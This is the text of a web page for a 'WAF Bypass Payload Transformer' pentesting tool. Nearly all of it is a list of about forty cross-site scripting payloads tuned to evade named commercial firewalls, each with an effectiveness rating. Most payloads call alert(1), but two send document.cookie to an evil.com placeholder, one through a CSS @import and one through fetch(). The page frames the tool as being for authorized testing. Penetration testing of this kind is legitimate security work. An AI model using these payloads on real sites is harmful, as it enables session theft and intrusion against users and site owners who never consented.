What is a WAF bypass?

A WAF bypass is a technique used during authorized penetration testing to evade Web Application Firewall rules by transforming payloads using encoding, case manipulation, character insertion, or alternative syntax that the WAF does not detect.

How does this tool help with penetration testing?

This tool generates multiple transformed variants of your payload using different bypass techniques, each labeled with an effectiveness rating. You can quickly test many variants against a target WAF to find which transformations evade detection.

WAF Bypass Payload Transformer

Transform payloads to bypass Web Application Firewalls. Supports URL encoding, HTML entities, case manipulation, null byte injection, comment insertion, and WAF-specific bypass patterns for Cloudflare, ModSecurity, and AWS WAF. For authorized testing only.

X LinkedIn Reddit

Payload Type

Input Payload

40 bypasses

Case variationLow

<ScRiPt>alert(1)</sCrIpT>

Generic / Unknown

Double encodingMedium

%253Cscript%253Ealert(1)%253C/script%253E

CloudflareAWS WAF

Unicode escapeMedium

<script>\u0061lert(1)</script>

ModSecurity CRSGeneric / Unknown

HTML entity mixMedium

&#60;script&#62;alert(1)&#60;/script&#62;

Imperva / IncapsulaSucuri

SVG/onloadHigh

<svg/onload=alert(1)>

CloudflareAWS WAFAkamai

IMG tag with eventMedium

<img src=x onerror=alert(1)>

Generic / Unknown

JavaScript protocolHigh

javascript:/*--></title></style></textarea></script><svg onload=alert(1)//>

CloudflareImperva / Incapsula

DOM clobberingHigh

<form id=x><input name=y></form><script>alert(x.y)</script>

AWS WAFModSecurity CRS

mXSS (mutation)High

<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>

CloudflareAkamaiF5 BIG-IP ASM

SVG animateHigh

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Imperva / IncapsulaSucuri

Template literalMedium

<script>`${alert(1)}`</script>

ModSecurity CRS

Null byte injectionMedium

<scr%00ipt>alert(1)</scr%00ipt>

Generic / UnknownSucuri

CSS expressionLow

<div style="background:url(javascript:alert(1))">

Generic / Unknown

Data URIMedium

<a href="data:text/html,<script>alert(1)</script>">click</a>

Cloudflare

PolyglotHigh

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

CloudflareAWS WAFImperva / IncapsulaModSecurity CRSAkamai

Constructor trickHigh

<img src=x onerror=window[`al`+`ert`](1)>

CloudflareAWS WAF

Eval + atobHigh

<img src=x onerror=eval(atob(`YWxlcnQoMSk=`))>

ModSecurity CRSF5 BIG-IP ASM

SVG use xlinkHigh

<svg><use xlink:href="data:image/svg+xml,<svg id=x xmlns=http://www.w3.org/2000/svg><image href=1 onerror=alert(1) /></svg>#x" />

AkamaiImperva / Incapsula

Decimal encodingMedium

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

Generic / UnknownSucuri

Hex encodingMedium

<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

Generic / UnknownModSecurity CRS

Tab/newline injectionMedium

<img src=x onerror="al	ert(1)">

Cloudflare

Comment evasionMedium

<script>al/**/ert(1)</script>

ModSecurity CRSSucuri

Object tagMedium

<object data="javascript:alert(1)">

AWS WAFGeneric / Unknown

Iframe srcdocHigh

<iframe srcdoc="<script>alert(1)</script>">

CloudflareImperva / Incapsula

MathML + XLinkHigh

<math><maction actiontype="statusline#" xlink:href="javascript:alert(1)">click

F5 BIG-IP ASMAkamai

CSS @import exfilMedium

<style>@import url("http://evil.com/steal?data="+document.cookie)</style>

Generic / Unknown

Fetch API exfilHigh

<img src=x onerror="fetch(`http://evil.com/`+document.cookie)">

ModSecurity CRSAWS WAF

Prototype pollution XSSHigh

<script>Object.prototype.innerHTML="<img src=x onerror=alert(1)>"</script>

CloudflareF5 BIG-IP ASM

CDATA sectionLow

<![CDATA[<script>alert(1)</script>]]>

Generic / Unknown

Backtick templateMedium

<script>alert`1`</script>

ModSecurity CRSSucuri

Window.nameHigh

<script>name="alert(1)";eval(name)</script>

CloudflareAkamai

Location hashHigh

<script>eval(location.hash.slice(1))</script>#alert(1)

Imperva / IncapsulaF5 BIG-IP ASM

Top + selfHigh

<script>top[/al/.source+/ert/.source](1)</script>

AWS WAFModSecurity CRSCloudflare

details/ontoggleHigh

<details open ontoggle=alert(1)>

CloudflareBarracudaAWS WAF

marquee/onstartMedium

<marquee onstart=alert(1)>

BarracudaSucuri

body/onpageshowMedium

<body onpageshow=alert(1)>

Generic / UnknownBarracuda

input/onfocus+autofocusHigh

<input onfocus=alert(1) autofocus>

CloudflareAWS WAFBarracuda

select/onchangeMedium

<select autofocus onfocus=alert(1)><option>1</option></select>

Imperva / IncapsulaBarracuda

video/onerrorHigh

<video><source onerror=alert(1)>

AkamaiF5 BIG-IP ASMBarracuda

Fullwidth charsHigh

＜script＞alert(1)＜/script＞

CloudflareAkamai

155 bypass variants36 techniques9 WAF profiles16 detection signatures30 test payloads24 encoding steps

Related Tools

Payload Mutator Engine

Auto-generate 50+ WAF bypass mutations from any payload.

WAF-Specific Payload Encoder

Generate bypass payloads targeting 8 specific WAF vendors.

AI Payload Mutator

AI-generated bypass mutations for blocked payloads.

CSP Evaluator

Analyze Content Security Policy for misconfigurations.

$loading...